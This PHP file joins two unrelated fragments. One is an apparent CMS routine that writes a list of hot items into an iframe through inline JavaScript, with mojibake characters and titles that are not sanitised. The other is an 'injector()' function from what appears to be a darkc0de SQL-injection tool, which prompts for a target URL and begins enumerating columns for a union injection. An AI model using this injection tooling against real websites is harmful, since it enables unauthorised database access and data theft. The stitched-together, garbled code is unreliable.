<?php if (!function_exists('html')) { die('F'); } $show = ''; $rows > 50 && ($rows = 50); $listdb = Get_Info($type = 'hot', $rows ? $rows : 10, $leng ? $leng : 30, $fid, $mid = 0); foreach ($listdb as $rs) { $rs[url] = get_info_url($rs[id], $rs[fid], $rs[city_id]); $show .= "¡¤<a href='{$rs['url']}' target='_blank'>{$rs['title']}</a><br>"; } if ($webdb[RewriteUrl] == 1) { //È«¾Öα¾²Ì¬ rewrite_url($show); } $show = str_replace(array("\n", "\r", "'"), array("", "", "\\'"), $show); if ($webdb[cookieDomain]) { echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"{$webdb['cookieDomain']}\";</SCRIPT>"; } echo "<SCRIPT LANGUAGE=\"JavaScript\">\nparent.document.getElementById('{$iframeID}').innerHTML='{$show}';\n</SCRIPT>";
function injector() { fwrite(STDOUT, "\n-URL: "); $url = trim(fgets(STDIN)); fwrite(STDOUT, "\n-URL Ending (-- or /*): "); $end = trim(fgets(STDIN)); if (!preg_match("/darkc0de/", $url)) { print "[-] Please insert 'darkc0de' token on the URL\n"; print "[-] Example: http://site.com/news.php?id=darkc0de\n"; print "[-] Example: http://site.com/index.php?id=darkc0de&pg=news\n"; } else { switch ($end) { case '--': $end = '--'; break; case '/*': $end = '/*'; break; default: $end = '--'; break; } print "[-] URL : {$url}\n"; print "[%] Trying connect to host...\n"; if (con_host($url)) { print "[+] Connect to host successful\n"; print Get_Info($url); print "[-] Finding column number...\n"; inject_get_column_num($url, $end); } else { print "[!] Connect to host failed\n"; } } }